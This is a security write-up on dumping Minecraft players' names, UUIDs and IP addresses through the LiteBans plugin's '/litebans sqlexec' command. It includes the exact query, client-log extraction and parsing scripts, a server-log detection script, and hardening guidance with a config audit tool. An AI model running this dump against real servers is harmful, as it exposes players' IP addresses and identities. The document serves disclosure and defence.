
LiteBans Plugin User Database Dump Exploit

Overview

LiteBans is a popular paid punishment (ban/mute/warn) plugin for Minecraft server moderators and administrators. When installed, it stores player data and punishments in an SQL database: by default an embedded H2 database inside the plugin folder, or an external MySQL/MariaDB server if one is configured. Either way, the data is reachable through SQL.

MySQL is one of the most widely used relational database management systems; it stores data in tables and is driven by SQL queries, statements that read or modify the data in a database.

Examples of SQL queries:

  • SELECT * FROM my_table; returns every row and column stored in the table my_table.
  • SELECT email, password FROM my_table; returns only the email and password columns of every row in my_table.

Analysis

The plugin has a feature that lets you execute arbitrary SQL queries through an in-game command. This feature can be abused to dump the server's player data database. The command is gated by an administrator-level permission, so the people who can use it are staff members who hold that permission and anyone who has taken over such an account: this is not a bug in the plugin but a data-exposure risk that comes with granting the permission.
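Because the command is legitimate for whoever holds the permission, the only server-side trace of a dump is the command itself in the server log. The following detection script is an added example written for this page, not code from LiteBans or the original write-up. It assumes the standard Bukkit/Spigot console line format for player commands ("<player> issued server command: /<command>"); the sample log lines are constructed and the player names are made up.

```python
import re

# Assumed server-side log line format (standard Bukkit/Spigot console output;
# the write-up itself only shows client-side chat logs):
#   [HH:MM:SS] [Server thread/INFO]: <player> issued server command: /<command>
COMMAND_RE = re.compile(
    r"^\[(?P<time>\d{2}:\d{2}:\d{2})\] \[[^\]]+\]: "
    r"(?P<player>\S+) issued server command: (?P<cmd>/.*)$"
)


def find_sqlexec_uses(log_lines):
    """Return one dict per player invocation of /litebans sqlexec found in log_lines."""
    findings = []
    for raw in log_lines:
        m = COMMAND_RE.match(raw.strip())
        if not m:
            continue
        # Bukkit commands are case-insensitive, so compare the command and
        # sub-command case-insensitively; the query text is kept as typed.
        parts = m.group("cmd").split(None, 2)
        if len(parts) < 2 or parts[0].lower() != "/litebans" or parts[1].lower() != "sqlexec":
            continue
        query = parts[2].strip() if len(parts) == 3 else ""
        findings.append({
            "time": m.group("time"),
            "player": m.group("player"),
            "query": query,
            # A read of litebans_history is the player-data exfiltration case.
            "touches_history": "litebans_history" in query.lower(),
        })
    return findings


# Constructed sample server log; player names and commands are made up.
SAMPLE_SERVER_LOG = [
    "[22:31:20] [Server thread/INFO]: staff_one issued server command: /ban griefer42 1d Griefing",
    "[22:31:26] [Server thread/INFO]: staff_two issued server command: /litebans sqlexec SELECT * FROM litebans_history;",
    "[22:31:27] [Server thread/INFO]: griefer42 lost connection: Disconnected",
    "[22:32:01] [Server thread/INFO]: staff_two issued server command: /LiteBans SQLExec   SELECT COUNT(*) FROM litebans_bans;",
    "[22:33:10] [Server thread/INFO]: staff_one issued server command: /litebans reload",
]

if __name__ == "__main__":
    for f in find_sqlexec_uses(SAMPLE_SERVER_LOG):
        flag = "HISTORY DUMP" if f["touches_history"] else "sqlexec"
        print(f"{f['time']} {f['player']:<10} {flag:<12} {f['query']}")
```

Run it over the server's logs/latest.log (and the rotated, gzipped logs in the same folder) to see who has been running SQL through the plugin; a SELECT against litebans_history from a player account is the case this write-up describes.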

The plugin creates seven tables in the database:

  • litebans_bans
  • litebans_history
  • litebans_kicks
  • litebans_mutes
  • litebans_servers
  • litebans_sync
  • litebans_warnings

The table litebans_history contains the player data (last seen date, username, UUID and IP address), so it is the table you want to dump.

Exploiting

Simply execute the command /litebans sqlexec SELECT * FROM litebans_history;. The plugin runs the query and prints everything stored in the table litebans_history into the in-game chat as an ASCII table.

Everything shown in chat is also written to the client's log, so to get a copy of the database content, open the latest client log file (on Windows %appdata%\.minecraft\logs\latest.log; on Linux ~/.minecraft/logs/latest.log) and copy the dumped table from its first to its last line.

The database should look like something like this, in the latest.log file:

[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+---------+------------------------------------+------------+
[22:31:26] [Client thread/INFO]: [CHAT] |ID|DATE                   |NAME     |UUID                                |IP          |
[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+---------+------------------------------------+------------+
[22:31:26] [Client thread/INFO]: [CHAT] |1 |2020-04-17 13:22:38.924|CONSOLE  |CONSOLE                             |#           |
[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+---------+------------------------------------+------------+
[22:31:26] [Client thread/INFO]: [CHAT] |2 |2020-04-17 13:24:39.78 |GayCumAss|4fd3a2a8-bfe6-4144-94ac-bd04bb2e505b|127.0.0.1   |
[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+---------+------------------------------------+------------+
[22:31:26] [Client thread/INFO]: [CHAT] |3 |2020-04-17 13:25:58.758|wodx     |8b476e65-a1c9-4677-867b-6712382c537f|127.0.0.1   |
[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+---------+------------------------------------+------------+

You can use this small Python tool to strip the client log prefix from the dumped table (lines that are not chat lines are skipped):

CHAT_MARKER = "[CHAT] "

def main():
    path = input("Database path > ")
    with open(path, encoding="utf-8", errors="ignore") as src, open("out.txt", "w", encoding="utf-8") as out:
        for line in src:
            line = line.strip()
            # Keep only chat lines; everything else the client logged is dropped.
            if CHAT_MARKER in line:
                out.write(line.split(CHAT_MARKER, 1)[1] + "\n")

if __name__ == "__main__":
    main()
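The stripped output is still an ASCII table. The parser below is an added example for this page (not the write-up's own tool): it reads the chat-rendered table straight from the client log, uses the header row to name the columns and returns one record per row, then groups player names by IP. The sample lines are constructed in the same format as the log excerpt above, with made-up names and UUIDs.

```python
CHAT_MARKER = "[CHAT] "


def parse_sqlexec_table(log_lines):
    """Parse the ASCII table that /litebans sqlexec prints into chat.

    Accepts raw client-log lines (with the "[HH:MM:SS] [Client thread/INFO]: [CHAT] "
    prefix) or already-stripped lines, skips the '+----' border rows, takes the first
    '|' row as the header and returns one dict per data row keyed by column name.
    """
    header = None
    records = []
    for raw in log_lines:
        line = raw.strip()
        if CHAT_MARKER in line:
            line = line.split(CHAT_MARKER, 1)[1]
        if not line.startswith("|"):
            continue  # border rows and unrelated chat
        cells = [c.strip() for c in line.strip("|").split("|")]
        if header is None:
            header = cells
        elif len(cells) == len(header):
            records.append(dict(zip(header, cells)))
    return records


def names_by_ip(records):
    """Group player names by IP; '#' is the placeholder shown for the CONSOLE row."""
    by_ip = {}
    for r in records:
        ip = r.get("IP", "")
        if ip and ip != "#":
            by_ip.setdefault(ip, []).append(r["NAME"])
    return by_ip


# Constructed sample in the client-log format shown above (names/UUIDs made up).
SAMPLE_CLIENT_LOG = [
    "[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+-------+------------------------------------+---------+",
    "[22:31:26] [Client thread/INFO]: [CHAT] |ID|DATE                   |NAME   |UUID                                |IP       |",
    "[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+-------+------------------------------------+---------+",
    "[22:31:26] [Client thread/INFO]: [CHAT] |1 |2020-04-17 13:22:38.924|CONSOLE|CONSOLE                             |#        |",
    "[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+-------+------------------------------------+---------+",
    "[22:31:26] [Client thread/INFO]: [CHAT] |2 |2020-04-17 13:24:39.78 |alice  |11111111-2222-4333-8444-555555555555|127.0.0.1|",
    "[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+-------+------------------------------------+---------+",
    "[22:31:26] [Client thread/INFO]: [CHAT] |3 |2020-04-17 13:25:58.758|bob    |66666666-7777-4888-8999-aaaaaaaaaaaa|127.0.0.1|",
    "[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+-------+------------------------------------+---------+",
    "[22:31:30] [Client thread/INFO]: [CHAT] <alice> hi",
]

if __name__ == "__main__":
    rows = parse_sqlexec_table(SAMPLE_CLIENT_LOG)
    for row in rows:
        print(row)
    print(names_by_ip(rows))
```

The same function works on the page's out.txt, since lines without the chat marker are parsed as-is.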

Prevention

In the LiteBans 2.3.10 to 2.3.15 updates a security patch was added: the configuration option security.sqlexec is now set to true by default, which means only the console can use the sqlexec feature.

To prevent your server's database from being dumped through the command, set security.sqlexec to true in the LiteBans configuration file at ./plugins/LiteBans/config.yml. Do not rely on the default: if your config.yml was written by an older version, check the value explicitly, and restrict the sqlexec-related permission to accounts that actually need it.

With this setting enabled, players can no longer use /litebans sqlexec. Note that the console can still run it, so anyone with console access (panel login, RCON, SSH to the host) can still read the same data; the setting narrows who can dump the table, it does not make the stored IPs and UUIDs any less sensitive.

security:
  # If enabled, only the console can see IP addresses in /dupeip output.
  # This does not prevent players from using /dupeip. It only prevents them from seeing IP addresses.
  dupeip: true
  # If enabled, only the console can use /iphistory.
  iphistory: true
  # If enabled, only the console can use "/litebans sqlexec".
  sqlexec: true
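To check a server's config.yml for the three settings above without installing a YAML library, the following audit script is an added example for this page (not part of LiteBans). It does a minimal line-based parse of the top-level security: block, ignoring comments, and reports every key that is missing or set to false. The two config fragments are constructed; the hardened one mirrors the snippet above.

```python
# Security keys under 'security:' and what each enforces when true
# (taken from the comments in the config snippet above).
SECURITY_KEYS = {
    "sqlexec": "only the console can use /litebans sqlexec",
    "iphistory": "only the console can use /iphistory",
    "dupeip": "only the console can see IP addresses in /dupeip output",
}


def parse_security_section(config_text):
    """Return {key: bool} for the keys indented under the top-level 'security:' block.

    Minimal parser: '#' comments are dropped, blank lines skipped, and the block ends
    at the next unindented key. Values other than 'true' are treated as false.
    """
    settings = {}
    in_section = False
    for raw in config_text.splitlines():
        code = raw.split("#", 1)[0].rstrip()
        if not code.strip():
            continue
        if not code.startswith((" ", "\t")):  # top-level key
            in_section = code.strip() == "security:"
            continue
        if in_section:
            key, sep, value = code.strip().partition(":")
            if sep:
                settings[key.strip()] = value.strip().lower() == "true"
    return settings


def audit_security(config_text):
    """List findings for security keys that are missing or false; [] means hardened."""
    settings = parse_security_section(config_text)
    findings = []
    for key, effect in SECURITY_KEYS.items():
        if key not in settings:
            findings.append(f"security.{key} not set: effective value depends on the "
                            f"plugin version's default ({effect})")
        elif not settings[key]:
            findings.append(f"security.{key} is false: '{effect}' is NOT enforced")
    return findings


# Constructed config fragments (only the parts relevant here).
HARDENED_CONFIG = """\
sql:
  driver: h2   # assumed placeholder, not the real driver line
security:
  # If enabled, only the console can see IP addresses in /dupeip output.
  dupeip: true
  # If enabled, only the console can use /iphistory.
  iphistory: true
  # If enabled, only the console can use "/litebans sqlexec".
  sqlexec: true
"""

WEAK_CONFIG = """\
security:
  dupeip: true
  iphistory: true
  sqlexec: false   # players with the permission can dump the database
other:
  sqlexec: true    # outside the security block, must be ignored
"""

if __name__ == "__main__":
    for name, cfg in (("hardened", HARDENED_CONFIG), ("weak", WEAK_CONFIG)):
        print(name, audit_security(cfg) or ["OK"])
```

Point it at ./plugins/LiteBans/config.yml on each server; an empty result means all three console-only restrictions are explicitly on.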